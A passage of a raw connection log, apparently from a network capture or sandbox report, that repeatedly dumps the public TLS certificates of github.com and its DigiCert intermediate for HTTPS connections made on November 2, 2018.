2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: github.com DNSName: www.github.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C9 C2 53 61 66 9D 5F AB 25 F4 26 CD 0F 38 9A A8 ..Saf._.%.&..8..0010: 49 EA 48 A9 I.H.]]] Algorithm: [SHA256withRSA] Signature:0000: 70 0F 5A 96 A7 58 E5 BF 8A 9D A8 27 98 2B 00 7F p.Z..X.....'.+..0010: 26 A9 07 DA BA 7B 82 54 4F AF 69 CF BC F2 59 03 &......TO.i...Y.0020: 2B F2 D5 74 58 25 D8 1E A4 20 76 62 60 29 73 2A +..tX%... vb`)s*0030: D7 DC CC 6F 77 85 6B CA 6D 24 F8 35 13 47 3F D2 ...ow.k.m$.5.G?.0040: E2 69 0A 9D 34 2D 7B 7B 9B CD 1E 75 D5 50 6C 3E .i..4-.....u.Pl>0050: CB 1C A3 30 B1 AA 92 07 A9 3A 76 76 45 BD 78 91 ...0.....:vvE.x.0060: C4 CE 1A 9E 22 E4 0B 89 BA E6 8C C1 79 82 A3 B8 ....".......y...0070: D4 C0 FC 1F 2D ED 4D 52 55 41 2A A8 3A 2C AD 07 ....-.MRUA*.:,..0080: 72 AE 0A D2 C6 67 C4 4F 07 17 18 99 F7 65 A9 57 r....g.O.....e.W0090: 60 15 5A 34 4C 11 CF F6 CF 6B 21 36 80 EF C6 F1 `.Z4L....k!6....00A0: 54 63 26 35 39 EE BB C4 83 64 9B 24 0A 73 EC A0 Tc&59....d.$.s..00B0: 48 16 73 C8 B9 D7 48 55 56 98 7A F7 BB 97 5C 69 H.s...HUV.z...\i00C0: A4 06 18 04 78 DA FE 98 76 BE 22 2F 7F 07 77 87 ....x...v."/..w.00D0: 4E 88 19 9A F8 55 EC 5C 12 2A 59 48 DB 49 3E 15 N....U.\.*YH.I>.00E0: 5E 67 5A A2 5E EE CC 53 28 8C 0E 33 93 14 03 64 ^gZ.^..S(..3...d00F0: 0B C5 E5 78 09 94 01 5A 75 FC 92 9D AF ED 7A 29 ...x...Zu.....z)]
    Nov 2, 2018 11:01:22.358278036 MEZ44349248192.30.253.113192.168.0.50CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028[[ Version: V3 Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27182480329609083645624358951312470735111101465904409517579603324443610948627123317276574372284092612395466705913697296538729051610615914979630979130353728187634968718301037795642657343511174042315836449309023250377748929072088632079297292400799455978070288868084050898983836205888774855547544255622648360396227755156561340192722735895290847161205245369772696734401944671246358701321167149070896780343739667326363444343051093227411009129654263748425661222582889902796954800796685968517689977802189122916931470605744698837719347057766694419404975072163417802333656859496792447815284011528855507761771697613578237909299 public exponent: 65537 Validity: [From: Tue Oct 22 14:00:00 CEST 2013, To: Sun Oct 22 14:00:00 CEST 2028] Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0c79a944 b08c1195 2092615f e26b1d83]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF .>.i...G...&....0010: 63 64 2B C3 cd+.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]]] Algorithm: [SHA256withRSA] Signature:0000: 9D B6 D0 90 86 E1 86 02 ED C5 A0 F0 34 1C 74 C1 ............4.t.0010: 8D 76 CC 86 0A A8 F0 4A 8A 42 D6 3F C8 A9 4D AD .v.....J.B.?..M.0020: 7C 08 AD E6 B6 50 B8 A2 1A 4D 88 07 B1 29 21 DC .....P...M...)!.0030: E7 DA C6 3C 21 E0 E3 11 49 70 AC 7A 1D 01 A4 CA ...<!...Ip.z....0040: 11 3A 57 AB 7D 57 2A 40 74 FD D3 1D 85 18 50 DF .:W..W*@t.....P.0050: 57 47 75 A1 7D 55 20 2E 47 37 50 72 8C 7F 82 1B WGu..U .G7Pr....0060: D2 62 8F 2D 03 5A DA C3 C8 A1 CE 2C 52 A2 00 63 .b.-.Z.....,R..c0070: EB 73 BA 71 C8 49 27 23 97 64 85 9E 38 0E AD 63 .s.q.I'#.d..8..c0080: 68 3C BA 52 81 58 79 A3 2C 0C DF DE 6D EB 31 F2 h<.R.Xy.,...m.1.0090: BA A0 7C 6C F1 2C D4 E1 BD 77 84 37 03 CE 32 B5 ...l.,...w.7..2.00A0: C8 9A 81 1A 4A 92 4E 3B 46 9A 85 FE 83 A2 F9 9E ....J.N;F.......00B0: 8C A3 CC 0D 5E B3 3D CF 04 78 8F 14 14 7B 32 9C ....^.=..x....2.00C0: C7 00 A6 5C C4 B5 A1 55 8D 5A 56 68 A4 22 70 AA ...\...U.ZVh."p.00D0: 3C 81 71 D9 9D A8 45 3B F4 E5 F6 A2 51 DD C7 7B <.q...E;....Q...00E0: 62 E8 6F 0C 74 EB B8 DA F8 BF 87 0D 79 50 91 90 b.o.t.......yP..00F0: 9B 18 3B 91 59 27 F1 35 28 13 AB 26 7E D5 F7 7A ..;.Y'.5(..&...z]
    Nov 2, 2018 11:02:53.635261059 MEZ44349249192.30.253.113192.168.0.50CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private OrganizationCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue May 08 02:00:00 CEST 2018Wed Jun 03 14:00:00 CEST 2020[[ Version: V3 Subject: CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25025100770112519133826373044337089322469791879220152213643221754976969243477927257227415181039366015609149001175458675631697702239034823716334509809784926406937227125890521894087124165874208928008511527244368706849310092475511259401776633076671238008575313180508596720476568749022900129891932143823778833404532554658303977351639532131107111874168053266560861447299063764771943313867349795002140249378509492410727023509926138655327290063258841194245159501288231930813126290727910076185376418441777313922434226388044466254908262848472806237246586907086347793775219421137443851512766147228992395134669954845000049168203 public exponent: 65537 Validity: [From: Tue May 08 02:00:00 CEST 2018, To: Wed Jun 03 14:00:00 CEST 2020] Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0a063042 7f5bbced 69573965 93b6451f]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 82 01 6E 04 82 01 6A 01 68 00 76 00 A4 B9 09 ...n...j.h.v....0010: 90 B4 18 58 14 87 BB 13 A2 CC 67 70 0A 3C 35 98 ...X......gp.<5.0020: 04 F9 1B DF B8 E3 77 CD 0E C8 0D DC 10 00 00 01 ......w.........0030: 63 41 62 6D 0A 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0040: D1 66 9D FC 71 35 AC 58 7D 86 74 1A 5E FE E3 D3 .f..q5.X..t.^...0050: 5A 7B 2E FE 6E 01 10 2D BE 74 87 2F 4B 29 19 62 Z...n..-.t./K).b0060: 02 20 08 FE 60 1A FE B2 CD A6 B3 C4 12 B6 37 01 . ..`.........7.0070: 9D 9A 6C AE 10 53 52 83 6A 40 45 B3 09 95 41 60 ..l..SR.j@E...A`0080: 53 95 00 76 00 56 14 06 9A 2F D7 C2 EC D3 F5 E1 S..v.V.../......0090: BD 44 B2 3E C7 46 76 B9 BC 99 11 5C C0 EF 94 98 .D.>.Fv....\....00A0: 55 D6 89 D0 DD 00 00 01 63 41 62 6D 2D 00 00 04 U.......cAbm-...00B0: 03 00 47 30 45 02 21 00 A2 EE 89 94 BD 82 E6 D1 ..G0E.!.........00C0: BD 8B A1 BB 44 79 10 18 9E 52 28 EE 7E 89 C5 B6 ....Dy...R(.....00D0: 1D AE D6 1D 98 F5 16 25 02 20 56 0C 35 01 9E 75 .......%. V.5..u00E0: BC AF 44 36 29 C1 83 6D 85 3F 16 FC D9 3B CD 0C ..D6)..m.?...;..00F0: ED 39 4F 5E E1 C5 74 42 D8 86 00 76 00 BB D9 DF .9O^..tB...v....0100: BC 1F 8A 71 B5 93 94 23 97 AA 92 7B 47 38 57 95 ...q...#....G8W.0110: 0A AB 52 E8 1A 90 96 64 36 8E 1E D1 85 00 00 01 ..R....d6.......0120: 63 41 62 6D DF 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0130: A1 CD D4 CA 51 4D 8D F9 77 2A 70 AD 0E 25 8A CD ....QM..w*p..%..0140: F0 46 32 9E 5A 15 C6 1A 38 C8 F9 3A 0E AD C4 3E .F2.Z...8..:...>0150: 02 20 74 D1 F9 BB CA C2 DD 47 2C 95 05 78 07 DA . t......G,..x..0160: 34 6B 4C 36 D3 8A 26 0D 11 06 29 35 6E 12 9C 46 4kL6..&...)5n..F0170: 78 E4 x.[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com, accessMethod: caIssuers accessLocation: URIName: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/sha2-ev-server-g2.crl], DistributionPoint: [URIName: http://crl4.digicert.com/sha2-ev-server-g2.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.16.840.1.114412.2.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.1][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: github.com DNSName: www.github.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C9 C2 53 61 66 9D 5F AB 25 F4 26 CD 0F 38 9A A8 ..Saf._.%.&..8..0010: 49 EA 48 A9 I.H.]]] Algorithm: [SHA256withRSA] Signature:0000: 70 0F 5A 96 A7 58 E5 BF 8A 9D A8 27 98 2B 00 7F p.Z..X.....'.+..0010: 26 A9 07 DA BA 7B 82 54 4F AF 69 CF BC F2 59 03 &......TO.i...Y.0020: 2B F2 D5 74 58 25 D8 1E A4 20 76 62 60 29 73 2A +..tX%... vb`)s*0030: D7 DC CC 6F 77 85 6B CA 6D 24 F8 35 13 47 3F D2 ...ow.k.m$.5.G?.0040: E2 69 0A 9D 34 2D 7B 7B 9B CD 1E 75 D5 50 6C 3E .i..4-.....u.Pl>0050: CB 1C A3 30 B1 AA 92 07 A9 3A 76 76 45 BD 78 91 ...0.....:vvE.x.0060: C4 CE 1A 9E 22 E4 0B 89 BA E6 8C C1 79 82 A3 B8 ....".......y...0070: D4 C0 FC 1F 2D ED 4D 52 55 41 2A A8 3A 2C AD 07 ....-.MRUA*.:,..0080: 72 AE 0A D2 C6 67 C4 4F 07 17 18 99 F7 65 A9 57 r....g.O.....e.W0090: 60 15 5A 34 4C 11 CF F6 CF 6B 21 36 80 EF C6 F1 `.Z4L....k!6....00A0: 54 63 26 35 39 EE BB C4 83 64 9B 24 0A 73 EC A0 Tc&59....d.$.s..00B0: 48 16 73 C8 B9 D7 48 55 56 98 7A F7 BB 97 5C 69 H.s...HUV.z...\i00C0: A4 06 18 04 78 DA FE 98 76 BE 22 2F 7F 07 77 87 ....x...v."/..w.00D0: 4E 88 19 9A F8 55 EC 5C 12 2A 59 48 DB 49 3E 15 N....U.\.*YH.I>.00E0: 5E 67 5A A2 5E EE CC 53 28 8C 0E 33 93 14 03 64 ^gZ.^..S(..3...d00F0: 0B C5 E5 78 09 94 01 5A 75 FC 92 9D AF ED 7A 29 ...x...Zu.....z)]
    Nov 2, 2018 11:02:53.635261059 MEZ44349249192.30.253.113192.168.0.50CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028[[ Version: V3 Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27182480329609083645624358951312470735111101465904409517579603324443610948627123317276574372284092612395466705913697296538729051610615914979630979130353728187634968718301037795642657343511174042315836449309023250377748929072088632079297292400799455978070288868084050898983836205888774855547544255622648360396227755156561340192722735895290847161205245369772696734401944671246358701321167149070896780343739667326363444343051093227411009129654263748425661222582889902796954800796685968517689977802189122916931470605744698837719347057766694419404975072163417802333656859496792447815284011528855507761771697613578237909299 public exponent: 65537 Validity: [From: Tue Oct 22 14:00:00 CEST 2013, To: Sun Oct 22 14:00:00 CEST 2028] Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0c79a944 b08c1195 2092615f e26b1d83]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF .>.i...G...&....0010: 63 64 2B C3 cd+.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]]] Algorithm: [SHA256withRSA] Signature:0000: 9D B6 D0 90 86 E1 86 02 ED C5 A0 F0 34 1C 74 C1 ............4.t.0010: 8D 76 CC 86 0A A8 F0 4A 8A 42 D6 3F C8 A9 4D AD .v.....J.B.?..M.0020: 7C 08 AD E6 B6 50 B8 A2 1A 4D 88 07 B1 29 21 DC .....P...M...)!.0030: E7 DA C6 3C 21 E0 E3 11 49 70 AC 7A 1D 01 A4 CA ...<!...Ip.z....0040: 11 3A 57 AB 7D 57 2A 40 74 FD D3 1D 85 18 50 DF .:W..W*@t.....P.0050: 57 47 75 A1 7D 55 20 2E 47 37 50 72 8C 7F 82 1B WGu..U .G7Pr....0060: D2 62 8F 2D 03 5A DA C3 C8 A1 CE 2C 52 A2 00 63 .b.-.Z.....,R..c0070: EB 73 BA 71 C8 49 27 23 97 64 85 9E 38 0E AD 63 .s.q.I'#.d..8..c0080: 68 3C BA 52 81 58 79 A3 2C 0C DF DE 6D EB 31 F2 h<.R.Xy.,...m.1.0090: BA A0 7C 6C F1 2C D4 E1 BD 77 84 37 03 CE 32 B5 ...l.,...w.7..2.00A0: C8 9A 81 1A 4A 92 4E 3B 46 9A 85 FE 83 A2 F9 9E ....J.N;F.......00B0: 8C A3 CC 0D 5E B3 3D CF 04 78 8F 14 14 7B 32 9C ....^.=..x....2.00C0: C7 00 A6 5C C4 B5 A1 55 8D 5A 56 68 A4 22 70 AA ...\...U.ZVh."p.00D0: 3C 81 71 D9 9D A8 45 3B F4 E5 F6 A2 51 DD C7 7B <.q...E;....Q...00E0: 62 E8 6F 0C 74 EB B8 DA F8 BF 87 0D 79 50 91 90 b.o.t.......yP..00F0: 9B 18 3B 91 59 27 F1 35 28 13 AB 26 7E D5 F7 7A ..;.Y'.5(..&...z]
    Nov 2, 2018 11:04:24.953212976 MEZ44349250192.30.253.112192.168.0.50CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private OrganizationCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue May 08 02:00:00 CEST 2018Wed Jun 03 14:00:00 CEST 2020[[ Version: V3 Subject: CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25025100770112519133826373044337089322469791879220152213643221754976969243477927257227415181039366015609149001175458675631697702239034823716334509809784926406937227125890521894087124165874208928008511527244368706849310092475511259401776633076671238008575313180508596720476568749022900129891932143823778833404532554658303977351639532131107111874168053266560861447299063764771943313867349795002140249378509492410727023509926138655327290063258841194245159501288231930813126290727910076185376418441777313922434226388044466254908262848472806237246586907086347793775219421137443851512766147228992395134669954845000049168203 public exponent: 65537 Validity: [From: Tue May 08 02:00:00 CEST 2018, To: Wed Jun 03 14:00:00 CEST 2020] Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0a063042 7f5bbced 69573965 93b6451f]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 82 01 6E 04 82 01 6A 01 68 00 76 00 A4 B9 09 ...n...j.h.v....0010: 90 B4 18 58 14 87 BB 13 A2 CC 67 70 0A 3C 35 98 ...X......gp.<5.0020: 04 F9 1B DF B8 E3 77 CD 0E C8 0D DC 10 00 00 01 ......w.........0030: 63 41 62 6D 0A 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0040: D1 66 9D FC 71 35 AC 58 7D 86 74 1A 5E FE E3 D3 .f..q5.X..t.^...0050: 5A 7B 2E FE 6E 01 10 2D BE 74 87 2F 4B 29 19 62 Z...n..-.t./K).b0060: 02 20 08 FE 60 1A FE B2 CD A6 B3 C4 12 B6 37 01 . ..`.........7.0070: 9D 9A 6C AE 10 53 52 83 6A 40 45 B3 09 95 41 60 ..l..SR.j@E...A`0080: 53 95 00 76 00 56 14 06 9A 2F D7 C2 EC D3 F5 E1 S..v.V.../......0090: BD 44 B2 3E C7 46 76 B9 BC 99 11 5C C0 EF 94 98 .D.>.Fv....\....00A0: 55 D6 89 D0 DD 00 00 01 63 41 62 6D 2D 00 00 04 U.......cAbm-...00B0: 03 00 47 30 45 02 21 00 A2 EE 89 94 BD 82 E6 D1 ..G0E.!.........00C0: BD 8B A1 BB 44 79 10 18 9E 52 28 EE 7E 89 C5 B6 ....Dy...R(.....00D0: 1D AE D6 1D 98 F5 16 25 02 20 56 0C 35 01 9E 75 .......%. V.5..u00E0: BC AF 44 36 29 C1 83 6D 85 3F 16 FC D9 3B CD 0C ..D6)..m.?...;..00F0: ED 39 4F 5E E1 C5 74 42 D8 86 00 76 00 BB D9 DF .9O^..tB...v....0100: BC 1F 8A 71 B5 93 94 23 97 AA 92 7B 47 38 57 95 ...q...#....G8W.0110: 0A AB 52 E8 1A 90 96 64 36 8E 1E D1 85 00 00 01 ..R....d6.......0120: 63 41 62 6D DF 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0130: A1 CD D4 CA 51 4D 8D F9 77 2A 70 AD 0E 25 8A CD ....QM..w*p..%..0140: F0 46 32 9E 5A 15 C6 1A 38 C8 F9 3A 0E AD C4 3E .F2.Z...8..:...>0150: 02 20 74 D1 F9 BB CA C2 DD 47 2C 95 05 78 07 DA . t......G,..x..0160: 34 6B 4C 36 D3 8A 26 0D 11 06 29 35 6E 12 9C 46 4kL6..&...)5n..F0170: 78 E4 x.[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com, accessMethod: caIssuers accessLocation: URIName: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/sha2-ev-server-g2.crl], DistributionPoint: [URIName: http://crl4.digicert.com/sha2-ev-server-g2.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.16.840.1.114412.2.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.1][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: github.com DNSName: www.github.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C9 C2 53 61 66 9D 5F AB 25 F4 26 CD 0F 38 9A A8 ..Saf._.%.&..8..0010: 49 EA 48 A9 I.H.]]] Algorithm: [SHA256withRSA] Signature:0000: 70 0F 5A 96 A7 58 E5 BF 8A 9D A8 27 98 2B 00 7F p.Z..X.....'.+..0010: 26 A9 07 DA BA 7B 82 54 4F AF 69 CF BC F2 59 03 &......TO.i...Y.0020: 2B F2 D5 74 58 25 D8 1E A4 20 76 62 60 29 73 2A +..tX%... vb`)s*0030: D7 DC CC 6F 77 85 6B CA 6D 24 F8 35 13 47 3F D2 ...ow.k.m$.5.G?.0040: E2 69 0A 9D 34 2D 7B 7B 9B CD 1E 75 D5 50 6C 3E .i..4-.....u.Pl>0050: CB 1C A3 30 B1 AA 92 07 A9 3A 76 76 45 BD 78 91 ...0.....:vvE.x.0060: C4 CE 1A 9E 22 E4 0B 89 BA E6 8C C1 79 82 A3 B8 ....".......y...0070: D4 C0 FC 1F 2D ED 4D 52 55 41 2A A8 3A 2C AD 07 ....-.MRUA*.:,..0080: 72 AE 0A D2 C6 67 C4 4F 07 17 18 99 F7 65 A9 57 r....g.O.....e.W0090: 60 15 5A 34 4C 11 CF F6 CF 6B 21 36 80 EF C6 F1 `.Z4L....k!6....00A0: 54 63 26 35 39 EE BB C4 83 64 9B 24 0A 73 EC A0 Tc&59....d.$.s..00B0: 48 16 73 C8 B9 D7 48 55 56 98 7A F7 BB 97 5C 69 H.s...HUV.z...\i00C0: A4 06 18 04 78 DA FE 98 76 BE 22 2F 7F 07 77 87 ....x...v."/..w.00D0: 4E 88 19 9A F8 55 EC 5C 12 2A 59 48 DB 49 3E 15 N....U.\.*YH.I>.00E0: 5E 67 5A A2 5E EE CC 53 28 8C 0E 33 93 14 03 64 ^gZ.^..S(..3...d00F0: 0B C5 E5 78 09 94 01 5A 75 FC 92 9D AF ED 7A 29 ...x...Zu.....z)]
    Nov 2, 2018 11:04:24.953212976 MEZ44349250192.30.253.112192.168.0.50CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028[[ Version: V3 Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27182480329609083645624358951312470735111101465904409517579603324443610948627123317276574372284092612395466705913697296538729051610615914979630979130353728187634968718301037795642657343511174042315836449309023250377748929072088632079297292400799455978070288868084050898983836205888774855547544255622648360396227755156561340192722735895290847161205245369772696734401944671246358701321167149070896780343739667326363444343051093227411009129654263748425661222582889902796954800796685968517689977802189122916931470605744698837719347057766694419404975072163417802333656859496792447815284011528855507761771697613578237909299 public exponent: 65537 Validity: [From: Tue Oct 22 14:00:00 CEST 2013, To: Sun Oct 22 14:00:00 CEST 2028] Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0c79a944 b08c1195 2092615f e26b1d83]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF .>.i...G...&....0010: 63 64 2B C3 cd+.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]]] Algorithm: [SHA256withRSA] Signature:0000: 9D B6 D0 90 86 E1 86 02 ED C5 A0 F0 34 1C 74 C1 